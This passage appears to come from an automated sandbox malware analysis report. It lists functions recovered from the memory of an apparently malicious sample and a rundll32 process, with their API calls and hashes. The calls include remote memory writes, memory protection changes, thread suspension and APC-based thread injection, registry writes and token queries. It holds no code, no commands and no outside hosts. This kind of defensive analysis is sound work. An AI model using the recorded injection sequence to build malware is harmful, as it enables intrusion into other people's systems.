Part of subcall function 00E69994: NtReadVirtualMemory.NTDLL ref: 00E699B3

Memory Dump Source

Source File: 0000001C.00000002.542236121.0000000000E51000.00000020.00020000.sdmp, Offset: 00E51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_e51000_control.jbxd

Yara matches

Similarity

API ID: AllocateHeapInformationMemoryProcessQueryReadVirtual
String ID:
API String ID: 886377554-0
Opcode ID: 6c793667207bbe2f381ded7d0a3ef7681cb1aa8737acbacff40ac2f2b4e3a693
Instruction ID: dd204bd2b908f87a5b25d5534f46d842ed3e69a640f700a28e0e89ee1f8b2b3e
Opcode Fuzzy Hash: 6c793667207bbe2f381ded7d0a3ef7681cb1aa8737acbacff40ac2f2b4e3a693
Instruction Fuzzy Hash: D251E530218B488BD729EF18E8857A673E5FBD8344F04456EA84DC3246DF34DD41CB82

Uniqueness

Uniqueness Score: -1.00%

Function 00E7AB44, Relevance: 1.8, APIs: 1, Instructions: 286memoryCOMMON

Download Yara Rule

APIs

HeapCreate.KERNELBASE ref: 00E7AB9E

Memory Dump Source

Source File: 0000001C.00000002.542236121.0000000000E51000.00000020.00020000.sdmp, Offset: 00E51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_e51000_control.jbxd

Yara matches

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: b5832ff44e7a9416d80d201301d07f7436e5bfb8180f97c70cf6f3843a8594b3
Instruction ID: 3735c15cba55581adca224f0b9532516cf732c67fc1b6f1b7033d6cf6fc8ae16
Opcode Fuzzy Hash: b5832ff44e7a9416d80d201301d07f7436e5bfb8180f97c70cf6f3843a8594b3
Instruction Fuzzy Hash: 3C81A230208B498FE728EF28EC8466A37E6EB94315F04953EE54AD3261EF75D8428742

Uniqueness

Uniqueness Score: -1.00%

Function 00E51B84, Relevance: 1.6, APIs: 1, Instructions: 51nativeCOMMON

Download Yara Rule

APIs

NtQueryInformationProcess.NTDLL ref: 00E51BAA

Memory Dump Source

Source File: 0000001C.00000002.542236121.0000000000E51000.00000020.00020000.sdmp, Offset: 00E51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_e51000_control.jbxd

Yara matches

Similarity

API ID: InformationProcessQuery
String ID:
API String ID: 1778838933-0
Opcode ID: a47a6288c91f39f2d972061f96e803c24b73f60b47e4bc17258e528937957287
Instruction ID: 7339fe49296f8ebcfc8bb79a22adb8c4c792bbaa108ef1bdd08a4c8c11f4d8a7
Opcode Fuzzy Hash: a47a6288c91f39f2d972061f96e803c24b73f60b47e4bc17258e528937957287
Instruction Fuzzy Hash: 3C018630218E0D8F9BD8DF69D4C4B7573E5FBA834A75419BEA809C3110E778D886C701

Uniqueness

Uniqueness Score: -1.00%

Function 00E70E70, Relevance: 1.5, APIs: 1, Instructions: 46nativeCOMMON

Download Yara Rule

APIs

NtMapViewOfSection.NTDLL ref: 00E70EBC

Memory Dump Source

Source File: 0000001C.00000002.542236121.0000000000E51000.00000020.00020000.sdmp, Offset: 00E51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_e51000_control.jbxd

Yara matches

Similarity

API ID: SectionView
String ID:
API String ID: 1323581903-0
Opcode ID: fcd82b1f9bd2768ab02ed58a59795749d2e6ecb94e6dd7f1d9f4b656cf451d04
Instruction ID: 88aaef56b507120d9de4186ba744240a08f5a2277d4b9d4732e6689755db2f4e
Opcode Fuzzy Hash: fcd82b1f9bd2768ab02ed58a59795749d2e6ecb94e6dd7f1d9f4b656cf451d04
Instruction Fuzzy Hash: 9C0112B0A08B048FCB48EF68D0C8569BBE0FB58311B100A6FE849CB796DB30D885CB45

Uniqueness

Uniqueness Score: -1.00%

Function 00E69994, Relevance: 1.5, APIs: 1, Instructions: 30nativeCOMMON

Download Yara Rule

APIs

NtReadVirtualMemory.NTDLL ref: 00E699B3

Memory Dump Source

Source File: 0000001C.00000002.542236121.0000000000E51000.00000020.00020000.sdmp, Offset: 00E51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_e51000_control.jbxd

Yara matches

Similarity

API ID: MemoryReadVirtual
String ID:
API String ID: 2834387570-0
Opcode ID: 1d6ef942790bfe01841c18760b22fb51e4e56c9f11386d1350fb96d209f83ad7
Instruction ID: d0e39a3e13a456e9b5b4b363c2e089ce08f3a1386f5ac84b762df977ab649e46
Opcode Fuzzy Hash: 1d6ef942790bfe01841c18760b22fb51e4e56c9f11386d1350fb96d209f83ad7
Instruction Fuzzy Hash: DFE09A30758A848BEB04ABB5ACC927C77E5EB98305F10483DE989C7221CA39C8888742

Uniqueness

Uniqueness Score: -1.00%

Function 00E51FBC, Relevance: 1.5, APIs: 1, Instructions: 30nativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL ref: 00E51FDB

Memory Dump Source

Source File: 0000001C.00000002.542236121.0000000000E51000.00000020.00020000.sdmp, Offset: 00E51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_e51000_control.jbxd

Yara matches

Similarity

API ID: MemoryVirtualWrite
String ID:
API String ID: 3527976591-0
Opcode ID: 8f222c4cfc0c454b3774edc81450be03eb8263ee1480c794f798cb3d3798f92c
Instruction ID: d97f1ed99bacff5eea0cf4b6f617f53d63cd1583fcc8bb19a31f690420cab3e0
Opcode Fuzzy Hash: 8f222c4cfc0c454b3774edc81450be03eb8263ee1480c794f798cb3d3798f92c
Instruction Fuzzy Hash: 3CE0DF78B25A814BEB00ABF898C933933E0FB88306F100979F941C7360C77DC8498342

Uniqueness

Uniqueness Score: -1.00%

Function 00E58784, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 106
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00E7D608: RegCreateKeyA.ADVAPI32 ref: 00E7D62B

RegQueryValueExA.KERNELBASE ref: 00E587F8
RegSetValueExA.KERNELBASE ref: 00E58850

Strings

(, xrefs: 00E58804
(, xrefs: 00E5883C

Memory Dump Source

Source File: 0000001C.00000002.542236121.0000000000E51000.00000020.00020000.sdmp, Offset: 00E51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_e51000_control.jbxd

Yara matches

Similarity

API ID: Value$CreateQuery
String ID: ($(
API String ID: 116021097-222463766
Opcode ID: 6f5cc901afd6a421e113164d0215a0e994425601b987ba33cff0349f0f073630
Instruction ID: 4aa3b503635032cf9f7ee2d94b0aa491396822ee9a9a6e67dabf3a69c8127332
Opcode Fuzzy Hash: 6f5cc901afd6a421e113164d0215a0e994425601b987ba33cff0349f0f073630
Instruction Fuzzy Hash: 2931D0306087488FE758EF18E845776B7E5F798345F50193EE889D3260DF78994ACB42

Uniqueness

Uniqueness Score: -1.00%

Function 00E66698, Relevance: 6.2, APIs: 4, Instructions: 237
threadinjectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtectEx.KERNELBASE ref: 00E667B8
ResumeThread.KERNELBASE ref: 00E667F6
SuspendThread.KERNELBASE ref: 00E6681A
VirtualProtectEx.KERNELBASE ref: 00E66898

Memory Dump Source

Source File: 0000001C.00000002.542236121.0000000000E51000.00000020.00020000.sdmp, Offset: 00E51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_e51000_control.jbxd

Yara matches

Similarity

API ID: ProtectThreadVirtual$ResumeSuspend
String ID:
API String ID: 3483329683-0
Opcode ID: 4831e070d1b16d59bb910ba113a5ecf6f933ecb0d3d388b311226ffc58d38cd2
Instruction ID: a6cadc811f5bc8324887fdd2d460f2db5535bc16cefe08a6ceb47e93d14dff0d
Opcode Fuzzy Hash: 4831e070d1b16d59bb910ba113a5ecf6f933ecb0d3d388b311226ffc58d38cd2
Instruction Fuzzy Hash: C461C23075CB084BD758EB28E8857AAB3E1FB89345F00552EE48ED3291DF34DD468B46

Uniqueness

Uniqueness Score: -1.00%

Function 00E5BC34, Relevance: 6.1, APIs: 4, Instructions: 146
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNELBASE ref: 00E5BD05
SetFilePointer.KERNELBASE ref: 00E5BD1F
ReadFile.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E7B93C), ref: 00E5BD41
FindCloseChangeNotification.KERNELBASE ref: 00E5BD5C

Memory Dump Source

Source File: 0000001C.00000002.542236121.0000000000E51000.00000020.00020000.sdmp, Offset: 00E51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_e51000_control.jbxd

Yara matches

Similarity

API ID: File$ChangeCloseCreateFindNotificationPointerRead
String ID:
API String ID: 2405668454-0
Opcode ID: d7e8fd127344500a9d89c9eabf66f7fa46c7cba5cde05e0d20a4177cfd3c6994
Instruction ID: fba171f0943192a64dd47f5768ff58fe79cfd436e9bd6194dd67afcf94f6a627
Opcode Fuzzy Hash: d7e8fd127344500a9d89c9eabf66f7fa46c7cba5cde05e0d20a4177cfd3c6994
Instruction Fuzzy Hash: 5A410B30218A084FDB58DF28DCC962977E1FB98315B245A6DE49BC7262DF38D847CB85

Uniqueness

Uniqueness Score: -1.00%

Function 00E7C0D4, Relevance: 4.6, APIs: 3, Instructions: 101
registrymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryValueExA.KERNELBASE ref: 00E7C117
RtlAllocateHeap.NTDLL ref: 00E7C139
RegQueryValueExA.KERNELBASE ref: 00E7C19B

Memory Dump Source

Source File: 0000001C.00000002.542236121.0000000000E51000.00000020.00020000.sdmp, Offset: 00E51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_e51000_control.jbxd

Yara matches

Similarity

API ID: QueryValue$AllocateHeap
String ID:
API String ID: 2311914766-0
Opcode ID: dcc6364a7cff33092d67d86a1e88a29ad70a683c2373a61b17e253f27ce7c814
Instruction ID: 682085545f1f0500da842182010cde1268acaaa1e03df166f38b096665c55367
Opcode Fuzzy Hash: dcc6364a7cff33092d67d86a1e88a29ad70a683c2373a61b17e253f27ce7c814
Instruction Fuzzy Hash: 7131C17161CB088FDB48EF18D889666B7E0FBA8301F21852EE84DD3256DF30D841CB86

Uniqueness

Uniqueness Score: -1.00%

Function 00E7FBA4, Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 311
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE ref: 00E7FCE1

Strings

H, xrefs: 00E7FBC8

Memory Dump Source

Source File: 0000001C.00000002.542236121.0000000000E51000.00000020.00020000.sdmp, Offset: 00E51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_e51000_control.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: H
API String ID: 1029625771-2852464175
Opcode ID: 80515bd0cb8e00cb26f709d7b3957a638bb39c5a71ed7ea779f36b6bc8c5c77c
Instruction ID: 0bc20e17d579cd2385d1cb2c26c1ca612448c82f923bff1ad568ed58ce3e0673
Opcode Fuzzy Hash: 80515bd0cb8e00cb26f709d7b3957a638bb39c5a71ed7ea779f36b6bc8c5c77c
Instruction Fuzzy Hash: 00A17030608F098FEB65DF58D8887B6B7E1FB98319F04462ED84AD7261EF74D8418B81

Uniqueness

Uniqueness Score: -1.00%

Function 00E5E34C, Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 222
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrcmp.KERNEL32 ref: 00E5E4B9

Strings

, xrefs: 00E5E40D

Memory Dump Source

Source File: 0000001C.00000002.542236121.0000000000E51000.00000020.00020000.sdmp, Offset: 00E51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_e51000_control.jbxd

Yara matches

Similarity

API ID: lstrcmp
String ID:
API String ID: 1534048567-3916222277
Opcode ID: 932262b961ec7188e8508585a0e75dfec165fbffc2d36d3813a84719929387ff
Instruction ID: 06a8a7f7d3d0d9f32b298f9f0a586ed60d5c6940599f90d47e5d6ddaa936c923
Opcode Fuzzy Hash: 932262b961ec7188e8508585a0e75dfec165fbffc2d36d3813a84719929387ff
Instruction Fuzzy Hash: FF517672A08A084BD72CAF1C9C8617973C1F398315F24093EDCDAD3352EA25AE4787C2

Uniqueness

Uniqueness Score: -1.00%

Function 00E5BA3C, Relevance: 3.2, APIs: 2, Instructions: 202
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00E60770: VirtualProtect.KERNELBASE ref: 00E607A3

VirtualProtect.KERNELBASE ref: 00E5BB5A
VirtualProtect.KERNELBASE ref: 00E5BB7D

Memory Dump Source

Source File: 0000001C.00000002.542236121.0000000000E51000.00000020.00020000.sdmp, Offset: 00E51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_e51000_control.jbxd

Yara matches

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 537c1354849ecdbf07aa9d2237092f35c30ae36a9baa6ab7a01b3660000cf8bc
Instruction ID: 9c63534be61f235b547957df78e62943835fc26f20a088698d05b18817cd992c
Opcode Fuzzy Hash: 537c1354849ecdbf07aa9d2237092f35c30ae36a9baa6ab7a01b3660000cf8bc
Instruction Fuzzy Hash: F6519D70618F098FDB54EF19D889725B7E0FB98305F10156EE84ED3261DB34E985CB86

Uniqueness

Uniqueness Score: -1.00%

Function 00E6B288, Relevance: 3.1, APIs: 2, Instructions: 147COMMON

Download Yara Rule

APIs

StrRChrA.KERNELBASE ref: 00E6B2E6
RtlAddVectoredContinueHandler.NTDLL ref: 00E6B3DA

Memory Dump Source

Source File: 0000001C.00000002.542236121.0000000000E51000.00000020.00020000.sdmp, Offset: 00E51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_e51000_control.jbxd

Yara matches

Similarity

API ID: ContinueHandlerVectored
String ID:
API String ID: 3758255415-0
Opcode ID: 675295d3ff2ebfd6e1c66cf5e54aad3941e63d7ed530a95736b3b6422c8b3a47
Instruction ID: 224d248dd5887df7e348dee2c55b8a6e387ba00f0478d23ed4511fa16943c535
Opcode Fuzzy Hash: 675295d3ff2ebfd6e1c66cf5e54aad3941e63d7ed530a95736b3b6422c8b3a47
Instruction Fuzzy Hash: 71410730688B498FEB54EF38E8582AE77D1EB98355F04912EE84AD3261DF78C585CB01

Uniqueness

Uniqueness Score: -1.00%

Function 00E728EC, Relevance: 3.1, APIs: 2, Instructions: 114registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNELBASE ref: 00E72950
RegCloseKey.KERNELBASE ref: 00E729D3

Memory Dump Source

Source File: 0000001C.00000002.542236121.0000000000E51000.00000020.00020000.sdmp, Offset: 00E51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_e51000_control.jbxd

Yara matches

Similarity

API ID: CloseOpen
String ID:
API String ID: 47109696-0
Opcode ID: f8db927371737a2284b347feea4176df772e6c6722ce23622e429657fc7970e2
Instruction ID: ce842aaf2a7d654de82cc6148dd04f508760af7cdb5e7e04b8016b835153bd53
Opcode Fuzzy Hash: f8db927371737a2284b347feea4176df772e6c6722ce23622e429657fc7970e2
Instruction Fuzzy Hash: 8D316F30618A0C8FDB94EF68D884A6673E1F7A8304F148A7EE54ED3251DB34D945CB82

Uniqueness

Uniqueness Score: -1.00%

Function 00E6E8A8, Relevance: 3.1, APIs: 2, Instructions: 96registryCOMMON

Download Yara Rule

APIs

RegQueryValueExA.KERNELBASE ref: 00E6E8E6
RegCloseKey.KERNELBASE ref: 00E6E953

Memory Dump Source

Source File: 0000001C.00000002.542236121.0000000000E51000.00000020.00020000.sdmp, Offset: 00E51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_e51000_control.jbxd

Yara matches

Similarity

API ID: CloseQueryValue
String ID:
API String ID: 3356406503-0
Opcode ID: a280222c93ffb8a2a1dd04b2f857e1d4dfa6f574689e21c2ed8be034479b1d68
Instruction ID: f3717c1d96c0399d0c5a14416479fce1e6899672aaa1fcb9466f04323edcac5d
Opcode Fuzzy Hash: a280222c93ffb8a2a1dd04b2f857e1d4dfa6f574689e21c2ed8be034479b1d68
Instruction Fuzzy Hash: 3A213E30618B088FE798EF28E88966677E1FB98355F15456EE44AD3261EB34D841CB82

Uniqueness

Uniqueness Score: -1.00%

Function 00E7D608, Relevance: 3.1, APIs: 2, Instructions: 60registryCOMMON

Download Yara Rule

APIs

RegCreateKeyA.ADVAPI32 ref: 00E7D62B
RegOpenKeyA.ADVAPI32 ref: 00E7D638

Memory Dump Source

Source File: 0000001C.00000002.542236121.0000000000E51000.00000020.00020000.sdmp, Offset: 00E51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_e51000_control.jbxd

Yara matches

Similarity

API ID: CreateOpen
String ID:
API String ID: 436179556-0
Opcode ID: 46b1500a05769aa6653957655d5fab6f6f474f3957ccb8ab20a95ee67e5d8d2d
Instruction ID: 8fb642dd406a8b0ee9ee9e2696de3bb139ed7e35051b5fa396b745df2779cea8
Opcode Fuzzy Hash: 46b1500a05769aa6653957655d5fab6f6f474f3957ccb8ab20a95ee67e5d8d2d
Instruction Fuzzy Hash: 6D01803071CB088FDB54EF9CD488629BBF5EBE9345F14442EE88DD3261DAB4C9418B42

Uniqueness

Uniqueness Score: -1.00%

Function 00E60AC0, Relevance: 3.1, APIs: 2, Instructions: 59threadinjectionCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE ref: 00E60AF0
QueueUserAPC.KERNELBASE ref: 00E60B07

Memory Dump Source

Source File: 0000001C.00000002.542236121.0000000000E51000.00000020.00020000.sdmp, Offset: 00E51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_e51000_control.jbxd

Yara matches

Similarity

API ID: CreateQueueThreadUser
String ID:
API String ID: 3600083758-0
Opcode ID: dfb3e466a0a8e86603f8e13fb46ea2a18ab35b8e505637be4548d2ac0a2702aa
Instruction ID: 67d2852ce8fe6b5ea0b47f23335d5dfbb0b48a8076a92b8b141a1315e5d2fd75
Opcode Fuzzy Hash: dfb3e466a0a8e86603f8e13fb46ea2a18ab35b8e505637be4548d2ac0a2702aa
Instruction Fuzzy Hash: A0015E31718F188FEB64EF2DA84D73A77E2E7A8311724416AA409C3275DE78DC428B81

Uniqueness

Uniqueness Score: -1.00%

Function 00E52650, Relevance: 1.7, APIs: 1, Instructions: 216memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE ref: 00E5279C

Memory Dump Source

Source File: 0000001C.00000002.542236121.0000000000E51000.00000020.00020000.sdmp, Offset: 00E51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_e51000_control.jbxd

Yara matches

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: e913e7bdb883097a3b12cc78823202d948663da0d7e8d3c8fda136f06f28c0dd
Instruction ID: 03b11472fdcf208ca8aad200edea25ee4e82b55eab5c3b9ea278845a86bdb290
Opcode Fuzzy Hash: e913e7bdb883097a3b12cc78823202d948663da0d7e8d3c8fda136f06f28c0dd
Instruction Fuzzy Hash: 7561957061CF099FD798EF18D885A66B7E0FB68301F50552EE98ED3221DB70E845CB82

Uniqueness

Uniqueness Score: -1.00%

Function 00E5AC60, Relevance: 1.7, APIs: 1, Instructions: 162COMMON

Download Yara Rule

APIs

RtlDeleteBoundaryDescriptor.NTDLL ref: 00E5ADA6

Memory Dump Source

Source File: 0000001C.00000002.542236121.0000000000E51000.00000020.00020000.sdmp, Offset: 00E51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_e51000_control.jbxd

Yara matches

Similarity

API ID: BoundaryDeleteDescriptor
String ID:
API String ID: 3203483114-0
Opcode ID: 42a7f5bd8b2e472681d41e8399d722f55f865f0ab29f62aa4baf47a3eed3e34d
Instruction ID: 235741fdff0537f1bf3d372aebbf28b4f476019db08348a8790b33196194aa59
Opcode Fuzzy Hash: 42a7f5bd8b2e472681d41e8399d722f55f865f0ab29f62aa4baf47a3eed3e34d
Instruction Fuzzy Hash: 28415E30654E5C8FDB64FF5CD880565B3E1F798316764163EE40AD3221DA78DC4ACB82

Uniqueness

Uniqueness Score: -1.00%

Function 00E643B4, Relevance: 1.6, APIs: 1, Instructions: 107processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE ref: 00E64458

Memory Dump Source

Source File: 0000001C.00000002.542236121.0000000000E51000.00000020.00020000.sdmp, Offset: 00E51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_e51000_control.jbxd

Yara matches

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: a215f6f3926d51d25d2655916426ac927cf59c3a897e0660d70a6964fa82b2c5
Instruction ID: fda0ab102a4de41c70ea71f077dcdabb8ef959a4abc3a1e439f76a3fcf902e6d
Opcode Fuzzy Hash: a215f6f3926d51d25d2655916426ac927cf59c3a897e0660d70a6964fa82b2c5
Instruction Fuzzy Hash: 6C312D7060CB488FDBA4EF1CA885B6577E1EB98711F10466EE84DD3261DF30EC458B86

Uniqueness

Uniqueness Score: -1.00%

Function 00E60950, Relevance: 1.6, APIs: 1, Instructions: 105COMMON

Download Yara Rule

APIs

SleepEx.KERNEL32 ref: 00E60A2D

Memory Dump Source

Source File: 0000001C.00000002.542236121.0000000000E51000.00000020.00020000.sdmp, Offset: 00E51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_e51000_control.jbxd

Yara matches

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: d6e024ae2890405e8296ec7a7adfa76a3f9cff47b0f31b5fcf891aa6bf287356
Instruction ID: e484392df7cc22a9d4f86e35f7b1cbc45bcb4d7178d5b36337837cbab9c79c1e
Opcode Fuzzy Hash: d6e024ae2890405e8296ec7a7adfa76a3f9cff47b0f31b5fcf891aa6bf287356
Instruction Fuzzy Hash: AC31A4347547048BEB68EF79FCD596A73E2EBD8380B246129A447D3252DF38D8478B41

Uniqueness

Uniqueness Score: -1.00%

Function 00E5893C, Relevance: 1.6, APIs: 1, Instructions: 104COMMON

Download Yara Rule

APIs

RtlDeleteBoundaryDescriptor.NTDLL ref: 00E589DE

Memory Dump Source

Source File: 0000001C.00000002.542236121.0000000000E51000.00000020.00020000.sdmp, Offset: 00E51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_e51000_control.jbxd

Yara matches

Similarity

API ID: BoundaryDeleteDescriptor
String ID:
API String ID: 3203483114-0
Opcode ID: 04caec6322356621a72e47d1465824d1523e870edbc23877cb284b86c2df66ce
Instruction ID: 280fc6ba1d4d03ec1666e5a34ab096586b7c5b33b216dad44198096ab580a433
Opcode Fuzzy Hash: 04caec6322356621a72e47d1465824d1523e870edbc23877cb284b86c2df66ce
Instruction Fuzzy Hash: 1321B730708A0C4FDB99EF69E85527A73D1F798301B10592DE94FD3551DE34DC568782

Uniqueness

Uniqueness Score: -1.00%

Function 00E5F6DC, Relevance: 1.6, APIs: 1, Instructions: 80registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00E7D608: RegCreateKeyA.ADVAPI32 ref: 00E7D62B

RegQueryValueExA.KERNELBASE ref: 00E5F740

Memory Dump Source

Source File: 0000001C.00000002.542236121.0000000000E51000.00000020.00020000.sdmp, Offset: 00E51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_e51000_control.jbxd

Yara matches

Similarity

API ID: CreateQueryValue
String ID:
API String ID: 2711935003-0
Opcode ID: 066617ecd554d66c8e8d52e55b1cc36a7b34d398eb4d09c7dff54596e5683527
Instruction ID: e2e53280a665ad240ed7a737837ff2a71844a09fe7059a3e7be83e40a2c37172
Opcode Fuzzy Hash: 066617ecd554d66c8e8d52e55b1cc36a7b34d398eb4d09c7dff54596e5683527
Instruction Fuzzy Hash: 73210E30618B488FE750EF68D888B5BB7E1FB98345F50192EA48AD3250EB74D945CB42

Uniqueness

Uniqueness Score: -1.00%

Function 00E60770, Relevance: 1.6, APIs: 1, Instructions: 74memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE ref: 00E607A3

Memory Dump Source

Source File: 0000001C.00000002.542236121.0000000000E51000.00000020.00020000.sdmp, Offset: 00E51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_e51000_control.jbxd

Yara matches

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 34c560a541f8168961c80fa0c2cf80ca2d5f03411010d755178f2bbdc9de7312
Instruction ID: 59a4ff58d39767736867cf0d390e3f2c910c231da7e427bf779a396cd6442757
Opcode Fuzzy Hash: 34c560a541f8168961c80fa0c2cf80ca2d5f03411010d755178f2bbdc9de7312
Instruction Fuzzy Hash: D111903124C7088FAB14FF58B84542AB3E5EB98340710162EEC8EC3246EE70ED06CB86

Uniqueness

Uniqueness Score: -1.00%

Function 00E7D58C, Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

Part of subcall function 00E51FBC: NtWriteVirtualMemory.NTDLL ref: 00E51FDB

VirtualProtectEx.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00E7D5E0

Memory Dump Source

Source File: 0000001C.00000002.542236121.0000000000E51000.00000020.00020000.sdmp, Offset: 00E51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_e51000_control.jbxd

Yara matches

Similarity

API ID: Virtual$MemoryProtectWrite
String ID:
API String ID: 1789425917-0
Opcode ID: 9c23905e0cfd9592da978efcfef67a8dbdf2840bba39941add54b12aa0b65029
Instruction ID: 1f89b821253499683e67dcf9c2e2a8bc32cf1507c166572ca040ce318090007c
Opcode Fuzzy Hash: 9c23905e0cfd9592da978efcfef67a8dbdf2840bba39941add54b12aa0b65029
Instruction Fuzzy Hash: 89012C70618B088FCB48EF5CA0C5626B7E0FB9C311B5045AEE94DD7296DB70DD45CB86

Uniqueness

Uniqueness Score: -1.00%

Function 00E518B4, Relevance: 1.5, APIs: 1, Instructions: 42COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE ref: 00E51905

Memory Dump Source

Source File: 0000001C.00000002.542236121.0000000000E51000.00000020.00020000.sdmp, Offset: 00E51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_28_2_e51000_control.jbxd

Yara matches

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 5f4bc03c9f7741edf4b603b06abe66dffbd698ddb215ced6f46e11268b9e6993
Instruction ID: 47bf0316809f45b2de962ddfc9534aa8c799102483d687e59fed81072ef68c69
Opcode Fuzzy Hash: 5f4bc03c9f7741edf4b603b06abe66dffbd698ddb215ced6f46e11268b9e6993
Instruction Fuzzy Hash: D7F04F35318B495BEB98DF69D494B2AB2F1EBD8306F44293DB946C3250DB78C8458702

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: rundll32.exe PID: 4364 Parent PID: 5676 rundll32.exeCOMMON

Executed Functions

Function 0000020FDEA9AC44, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 113
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtQueryInformationToken.NTDLL ref: 0000020FDEA9ACF8
NtQueryInformationToken.NTDLL ref: 0000020FDEA9AD40
NtClose.NTDLL ref: 0000020FDEA9AD78

Strings

0, xrefs: 0000020FDEA9ACA3

Memory Dump Source

Source File: 00000024.00000002.542751757.0000020FDEA81000.00000020.00020000.sdmp, Offset: 0000020FDEA81000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_20fdea81000_rundll32.jbxd

Similarity

API ID: InformationQueryToken$Close
String ID: 0
API String ID: 459398573-4108050209
Opcode ID: 35ee677b0cbb54bf467b7fca8d9bcc29aae1a540e3b10aabd7638c4642f0cb5e
Instruction ID: ab3638f2f5940ce064a5a4bbe8ab4f7a9798ea6910fba1ac975280141c6e73fb
Opcode Fuzzy Hash: 35ee677b0cbb54bf467b7fca8d9bcc29aae1a540e3b10aabd7638c4642f0cb5e
Instruction Fuzzy Hash: F3413D30218B488FD7A4EF68D8C879AB7E1FBD8305F40492EE48EC3255DB349945CB82

Uniqueness

Uniqueness Score: -1.00%

Function 0000020FDEA986D0, Relevance: 4.0, APIs: 2, Instructions: 1012
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateMutexExA.KERNEL32 ref: 0000020FDEA9879B
GetUserNameA.ADVAPI32 ref: 0000020FDEA98A47

Part of subcall function 0000020FDEA90AC0: CreateThread.KERNELBASE ref: 0000020FDEA90AF0
Part of subcall function 0000020FDEA90AC0: QueueUserAPC.KERNELBASE ref: 0000020FDEA90B07

Memory Dump Source

Source File: 00000024.00000002.542751757.0000020FDEA81000.00000020.00020000.sdmp, Offset: 0000020FDEA81000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_20fdea81000_rundll32.jbxd

Similarity

API ID: CreateUser$MutexNameQueueThread
String ID:
API String ID: 2503873790-0
Opcode ID: db927e127c7b0f3f56bad06dadfac885180d990bb5282409794a2e9ab56c7683
Instruction ID: 6fd47be0fb5408229b443f672f6dd5bfda13b9ebf7b6d220c15914333c04f9fd
Opcode Fuzzy Hash: db927e127c7b0f3f56bad06dadfac885180d990bb5282409794a2e9ab56c7683
